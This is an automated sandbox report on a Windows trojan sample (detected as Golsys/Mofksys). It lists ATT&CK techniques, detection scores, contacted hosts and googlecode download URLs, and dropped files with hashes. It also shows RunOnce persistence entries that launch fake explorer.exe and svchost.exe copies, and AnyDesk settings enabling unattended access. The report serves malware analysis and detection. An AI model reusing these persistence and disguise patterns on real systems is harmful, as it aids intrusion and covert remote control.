                                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | 14 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                                Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                                External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | 233 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                                [Behavior Graph: ID: 666578, Sample: sJ9Q8UWMAX.com_7fdb00c80f02..., Startdate: 16/07/2022, Architecture: WINDOWS, Score: 100]

                                Source | Detection | Scanner | Label
                                sJ9Q8UWMAX.exe | 87% | Virustotal |
                                sJ9Q8UWMAX.exe | 86% | Metadefender |
                                sJ9Q8UWMAX.exe | 100% | ReversingLabs | Win32.Trojan.Golsys
                                sJ9Q8UWMAX.exe | 100% | Avira | TR/Patched.Ren.Gen
                                sJ9Q8UWMAX.exe | 100% | Joe Sandbox ML |

                                Source | Detection | Scanner | Label
                                C:\Windows\Resources\Themes\icsys.icn.exe | 100% | Avira | TR/Patched.Ren.Gen
                                C:\Windows\Resources\spoolsv.exe | 100% | Avira | TR/Patched.Ren.Gen
                                C:\Windows\Resources\svchost.exe | 100% | Avira | TR/Patched.Ren.Gen
                                C:\Windows\Resources\Themes\explorer.exe | 100% | Avira | TR/Patched.Ren.Gen
                                C:\Windows\Resources\Themes\icsys.icn.exe | 100% | Joe Sandbox ML |
                                C:\Windows\Resources\spoolsv.exe | 100% | Joe Sandbox ML |
                                C:\Windows\Resources\svchost.exe | 100% | Joe Sandbox ML |
                                C:\Windows\Resources\Themes\explorer.exe | 100% | Joe Sandbox ML |
                                C:\Users\user\Desktop\sj9q8uwmax.exe | 3% | Metadefender |
                                C:\Users\user\Desktop\sj9q8uwmax.exe | 0% | ReversingLabs |

                                No Antivirus matches

                                Source | Detection | Scanner | Label
                                codecmd01.googlecode.com | 0% | Virustotal |
                                codecmd03.googlecode.com | 0% | Virustotal |

                                Source | Detection | Scanner | Label
                                http://ns.adobe.c/g | 0% | URL Reputation | safe
                                http://codecmd02.googlecode.com/files/tjcm.gif | 0% | Avira URL Cloud | safe
                                https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid | 0% | Avira URL Cloud | safe
                                http://codecmd03.googlecode.com/files/tjcm.gif | 0% | Avira URL Cloud | safe
                                http://ns.adobe.cobj | 0% | URL Reputation | safe
                                http://codecmd01.googlecode.com/files/tjcm.gif | 0% | Avira URL Cloud | safe
                                https://my.anydesk.coms | 0% | Avira URL Cloud | safe
                                http://ns.ado/1 | 0% | URL Reputation | safe
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                boot.net.anydesk.com | 185.229.191.39 | true | false | | high
                                googlecode.l.googleusercontent.com | 142.250.102.82 | true | false | | high
                                codecmd01.googlecode.com | unknown | unknown | true | | unknown
                                codecmd03.googlecode.com | unknown | unknown | true | | unknown
                                codecmd02.googlecode.com | unknown | unknown | true | | unknown

                                Name | Malicious | Antivirus Detection | Reputation
                                http://codecmd02.googlecode.com/files/tjcm.gif | false | Avira URL Cloud: safe | unknown
                                http://codecmd03.googlecode.com/files/tjcm.gif | false | Avira URL Cloud: safe | unknown
                                http://codecmd01.googlecode.com/files/tjcm.gif | false | Avira URL Cloud: safe | unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | ASN | ASN Name | Malicious
92.223.88.41 | unknown | Austria | 199524 | GCOREAT | false
49.12.130.236 | unknown | Germany | 24940 | HETZNER-ASDE | false
49.12.130.237 | unknown | Germany | 24940 | HETZNER-ASDE | false
185.229.191.39 | boot.net.anydesk.com | Czech Republic | 60068 | CDN77GB | false
142.250.102.82 | googlecode.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1
                                                                                                                                                      127.0.0.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 666578
Start date and time: 2022-07-16 23:55:23 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50 (renamed file extension from com_7fdb00c80f0250575a05601c08627d50 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spre.evad.winEXE@22/19@15/7
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 3.6% (good quality ratio 0%)
                                                                                                                                                      • Quality average: 0%
                                                                                                                                                      • Quality standard deviation: 0%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 10
                                                                                                                                                      • Number of non-executed functions: 49
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 40.125.122.176, 52.242.101.226, 20.223.24.244, 20.238.103.94, 52.152.110.14
                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:57:05 | API Interceptor | 109x Sleep call for process: svchost.exe modified
23:57:11 | API Interceptor | 382x Sleep call for process: explorer.exe modified
23:57:15 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
23:57:18 | API Interceptor | 2x Sleep call for process: sj9q8uwmax.exe modified
23:57:23 | Autostart | Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                No context
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x50ff5d0b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):786432
                                                                                                                                                                                Entropy (8bit):0.2507255342529854
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                MD5:69F5E4678F8719329AF3904F61EFDCC4
                                                                                                                                                                                SHA1:F11DEC0687A6A7E4EA5A0BF1DE260E7104A2DFE3
                                                                                                                                                                                SHA-256:25D86C34A3A39DD15624B35E24F09B4F6C4F505EB1CBF215B113AF5F0F32210A
                                                                                                                                                                                SHA-512:4D89B80BFF0DA0A344692C3454C873A2532BE7131BACE905D08A653EA9C92544E1DE4455A700EB3C81D6B4548238B797259D6F8CF22512A099BB5A3196781ED0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0138474450443473
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXGFS/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQGFStfbltD7Ovf5
                                                                                                                                                                                MD5:257FA8889FB3A52D41A899309386D94C
                                                                                                                                                                                SHA1:7876C6E846A1E8B98FE4AB8E45D8A20C706FA4AF
                                                                                                                                                                                SHA-256:9246BE416AA4BD404FCDB26B668FE483CB3BBD000033A5D0E7B09E4C750AB36F
                                                                                                                                                                                SHA-512:C604E285B642C2DF8F4FF24E4A04EC10F694F04B83618C4AB3F23C5DFB47EEE44EC01AF299EECA74108838C89C31AA09E7B9E515A2A1D03C15D0A22B38C7C837
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0150719828554693
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXxslt9Xblt59Xh9XR5+1lf35X:rl3b/VFQSfbltD7Ovf5
                                                                                                                                                                                MD5:F5BE51E11DBE9CE68D2F045C974194DE
                                                                                                                                                                                SHA1:81C4865507955BDB63051EC8671AC247DD424A67
                                                                                                                                                                                SHA-256:C71BA5BB6671647150F70631359529F3482E45F01BE9F6C513CBF6E0BEFBDD13
                                                                                                                                                                                SHA-512:C28BCFA1DA5E4B7D2904CCB83E032FB3CD649E89D04678642424C28084FAACC97908B9CA386E848D05EA449223B825C361872A7D0C6D8FBCF1C6C5734C286AED
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.015427096491833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXOlt9Xblt59Xh9XR5+1lf35X:rl3b/VFQKfbltD7Ovf5
                                                                                                                                                                                MD5:BCF7AFF0DA3C0D3EE38CEBB085362040
                                                                                                                                                                                SHA1:789459B18926426F29A541BED94EF0F3F95DE6E0
                                                                                                                                                                                SHA-256:16A01ABDA6AE4E75609316843E7F8A6229EADBFA47977EB5DB7A26F4750322DF
                                                                                                                                                                                SHA-512:86C80C4862A8DE73C8A53D8E34C2A245BDEFC1493F00F67E41D15F954F4C5BAB7A9F48D30591CAD0B712040534F46B857DD2503E8AE352775EC76510058137A1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.014361755582742
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXs9Flt9Xblt59Xh9XR5+1lf35X:rl3b/VFQcffbltD7Ovf5
                                                                                                                                                                                MD5:572512E04D2B908761A25BC009462CF4
                                                                                                                                                                                SHA1:F858F6CC1CE079D39E2AF2817D089F18BE1C34BF
                                                                                                                                                                                SHA-256:05958FB61A9A5BD571776B72F7D8F7E0A3DDDDA66C991B14C6058F8EFC641FEE
                                                                                                                                                                                SHA-512:82AC3F38EDA6D3FEDAAE9B9DE2EA0CD9F61492CA30CC44C747453CFA1671822255CD67BCE5F9D34FA2D73F867470E7E993B7A1636388B0FFCFA831337D9B75C2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0150719828554693
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXpilt9Xblt59Xh9XR5+1lf35X:rl3b/VFQIfbltD7Ovf5
                                                                                                                                                                                MD5:B4B9E9F7358A49899990677913D7988E
                                                                                                                                                                                SHA1:3E7F2D84A66A543A21690B0E2295F13374FCD5BB
                                                                                                                                                                                SHA-256:B6CB874BE6483E0007DFF9A335C4CE6693D60BE18F24466642C818C069B34D90
                                                                                                                                                                                SHA-512:2B8A2EFC8616B75EA68E019467A7FC2C253CF1B0FFFD9144320482124A67BF4E99E5E4DC167F28125A6E02E5BC776BE7DEC77FB921495F43DF71090F7D779D11
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.015427096491833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQX8/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ8tfbltD7Ovf5
                                                                                                                                                                                MD5:2C110568CDEB0A26B47D610B1F57993D
                                                                                                                                                                                SHA1:E5406436410DE6B4B1E46B97ABCF3494E66303CE
                                                                                                                                                                                SHA-256:E8DDC4628D96D0BA9DB69397ACDAFADE8BCB3EA6B5EEB467B58144919290BBAF
                                                                                                                                                                                SHA-512:00C991C68D7CC55E854EC89ABFACD5016EF611BB8FD0287B825F6DC8FE59FC81522B88E8479253D68F746AE28518F836BA12D02196535C898B8DEA2DAEF308A7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                Entropy (8bit):6.026349035077884
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:uISTisbiCBtvlwyPAVRPQKdj6HLD8qqTSulEfpiHNZ92ZLm+1WID212:uISTZiCBtPPeRPxde/8qq+ulEkHNZX+R
                                                                                                                                                                                MD5:D3CFC62A5048B8C5531BDA669451A8E2
                                                                                                                                                                                SHA1:C9719FEB583AFC9491BCDA413D20375CAECC5B51
                                                                                                                                                                                SHA-256:F01AB65F7DB4EDDCFE92A8CBD0780DDB2AEA62B7865B3F2DC11E65346ED8D6F4
                                                                                                                                                                                SHA-512:3536D6E2C20747AAF38C326A5A55641A6B113B15FB9010B63E7E76AEF405FC9EA60D147C02ED5E8822CC2AAC50E41BDBB418D2E62D454B692462EE1D73076559
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):395
                                                                                                                                                                                Entropy (8bit):4.550646416567168
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:owD/DMWJcOMzo+raqQAmvbahOmQgRQUQgRQPYQgRQOYQgfxPZxi3B6QgfxPg3qg3:o0MWJctXmqQHvWhOLroBGgFBGA
                                                                                                                                                                                MD5:70C3EEFDFBBA4140FCF628059A5F4584
                                                                                                                                                                                SHA1:5AEAFA2E9C111D9E474F2F9647F171F39A5EFBD6
                                                                                                                                                                                SHA-256:5772F9CBEFF7585AAACBF776CB37EC9B9D99463F52790E909BC352633FD72278
                                                                                                                                                                                SHA-512:5265EDAE9B92CFE48F1915316A33DD6FFB9E197F1560B13D99306B57784312CC982D27F98822696A66A166BCF9B400C5474AEFC6AD3F5592F58735A973A0FA44
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ad.anynet.fpr=404b2696203e0596eef53d9df1a930c68df166d4.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=0.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles.version=1.
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                Entropy (8bit):4.559621408130901
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:snKw0XoKXVVxU4ThHhgCtXenKw0XkUnTFVlPJr/pOlA5lL/6:snXgRjtenvgTxoMlLC
                                                                                                                                                                                MD5:329E5D9D173516659F86B6A3396647AE
                                                                                                                                                                                SHA1:AD3EB2877CBBAF3BA77D11BBB70D154B90B3CE0D
                                                                                                                                                                                SHA-256:CD6B73BDA680A3867B89B0522B120D9476A1FCD59644F0A136787BE409A6434E
                                                                                                                                                                                SHA-512:D62CBD889E9464E6F52B80F09EAA26727AAB2267EF7330B0514C74C66D984C981C4E7B5A641E11E8C2952161F118625D31BF3176E321B56F5AF80F3F6AEB00A4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.343541104275968
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2UJcJJ88vNdLwd+oySUJtJJ89aNdLwd/yH:NJWrkdMJlxkdy
                                                                                                                                                                                MD5:F3719467AA20F82E1F26FF64BA9D3FF9
                                                                                                                                                                                SHA1:1628BA894CEBCAD262E33C2BDD1087F755D9BB80
                                                                                                                                                                                SHA-256:4837E903400AFF13E4C7479BA96B50F5E4102D497985E82BF15D93F82703FAD6
                                                                                                                                                                                SHA-512:2F7B7237B56E04BB410B0A9CCAC2EBFD285B6985F16774928E05CE02ECEDC5D5409A25854AC786A9DEEDFF1AD8D10AB59246E7CD370CC9883D25419F77A78C87
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.3415004321854416
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:xEhJtJJ88vNdLwd+oyNEhJtJJ89aNdLwd/yH:xMJlrkdaMJlxkdy
                                                                                                                                                                                MD5:7B50062F2C00880F8CCCA5844C01F5F0
                                                                                                                                                                                SHA1:B5DDADFFF043EE502FF6FCD97CC3E0AC897D0439
                                                                                                                                                                                SHA-256:A71ECB1F3B9B08C790125030D0A619B478708F2C130CA846283E07195FDED34A
                                                                                                                                                                                SHA-512:9A4EDEFFCF7FA53A0DF9F7F34D472364CE1E9518381CCE1857D73DF52A13EBC45C5B50D02FA92828D651B1B0AE3F36B5889F85EC823FDA0C5DE16E85B16961F0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.3415004321854416
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:xEhJtJJ88vNdLwd+oyNEhJtJJ89aNdLwd/yH:xMJlrkdaMJlxkdy
                                                                                                                                                                                MD5:7B50062F2C00880F8CCCA5844C01F5F0
                                                                                                                                                                                SHA1:B5DDADFFF043EE502FF6FCD97CC3E0AC897D0439
                                                                                                                                                                                SHA-256:A71ECB1F3B9B08C790125030D0A619B478708F2C130CA846283E07195FDED34A
                                                                                                                                                                                SHA-512:9A4EDEFFCF7FA53A0DF9F7F34D472364CE1E9518381CCE1857D73DF52A13EBC45C5B50D02FA92828D651B1B0AE3F36B5889F85EC823FDA0C5DE16E85B16961F0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3848888
                                                                                                                                                                                Entropy (8bit):7.999092263566694
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:98304:bJ9toRH4BY81fY8i2k5x2Vy5nkvusNFl0K9xdo:bfee2Gtu/GusNf0ax6
                                                                                                                                                                                MD5:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                SHA1:441A52F0112DA187244EEEC5B24A79F40CC17D47
                                                                                                                                                                                SHA-256:AEA8F85E569443A8C00B94FA19B5155B9122183F05BEDFDCDCCD1D18451760FD
                                                                                                                                                                                SHA-512:64E81E1F4975F8F4571EDAED80ACCE93A06ABE4FEEE2858DAFE9F0275EDD4734D12C6B7987EB3B9CCA84C3E071B0423656A4C8568B9BAFD48E3CFADF2DBC5277
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138466
                                                                                                                                                                                Entropy (8bit):5.873431225585432
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVAd:UVqoCl/YgjxEufVU0TbTyDDalyd
                                                                                                                                                                                MD5:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                SHA1:7AD1EC878AC466E1D148565826917FCD172580F0
                                                                                                                                                                                SHA-256:BCE99678E04087DE5DC3318BE25D57DAD8DD36201AAF4E77D29CD4E62688132A
                                                                                                                                                                                SHA-512:069F89E85C5040C752853D7F1CE3C9C65F8B8FE4BFABCB67C508E47DFEB59C98F64A31AF195C297700E177AC8353898678B980D89D71C08C283FCCBD2DBF1EBE
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138316
                                                                                                                                                                                Entropy (8bit):5.843351150845176
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVAk:UVqoCl/YgjxEufVU0TbTyDDalyk
                                                                                                                                                                                MD5:0A9BDF90EF50DEF16C6D4C363D0F0B9C
                                                                                                                                                                                SHA1:5C8AB92BE20C90234637A769EEDBD59122122301
                                                                                                                                                                                SHA-256:787E7D379518A641E58FF1A2A67C6A0818DF1C74A5DEE7119C0490B385036062
                                                                                                                                                                                SHA-512:05B09265C156042164112E2397B7A4F0632DF5DAB5BF2C590553CF2185A629F39E9C8BD6A733037343043E36B6414DCB9E3C1B80EB7812A9DE62D8D11269F0C9
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138457
                                                                                                                                                                                Entropy (8bit):5.85413891591597
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:UVqoCl/YgjxEufVU0TbTyDDalyErrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1:UsLqdufVUNDa3
                                                                                                                                                                                MD5:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                SHA1:A00E269BEDB2739229BB8C8F7FDDABDC90B45EF1
                                                                                                                                                                                SHA-256:D79C26844019590857DA0AD87864ECCBF407300F110F5333010838364B9E0B20
                                                                                                                                                                                SHA-512:65013B28C14AF529538438D4BE8D218040A47315DB8242B7121C694D4ABDBA5E0B52017D1543FA0A950004722BBBBD2E2C096E08162269468BE62F058DF05946
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):138302
                                                                                                                                                                                Entropy (8bit):5.871623753685915
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVA2:UVqoCl/YgjxEufVU0TbTyDDaly2
                                                                                                                                                                                MD5:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                SHA1:14DD6DFB61304BF2F3618259C99BE6BCCA507724
                                                                                                                                                                                SHA-256:94D947A14E722D6E9CDE5C222438C0BD0A95115B41227369C6B96930A03A1849
                                                                                                                                                                                SHA-512:617D757DF5AC2C45C9D7052B3DEAD381D3E869C07A6A889D69BA98950663C31BAC88C16005F36270F5500BA769BAAD45FDF3463D06FD9A74F34C528597FB6E18
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                Malicious:false
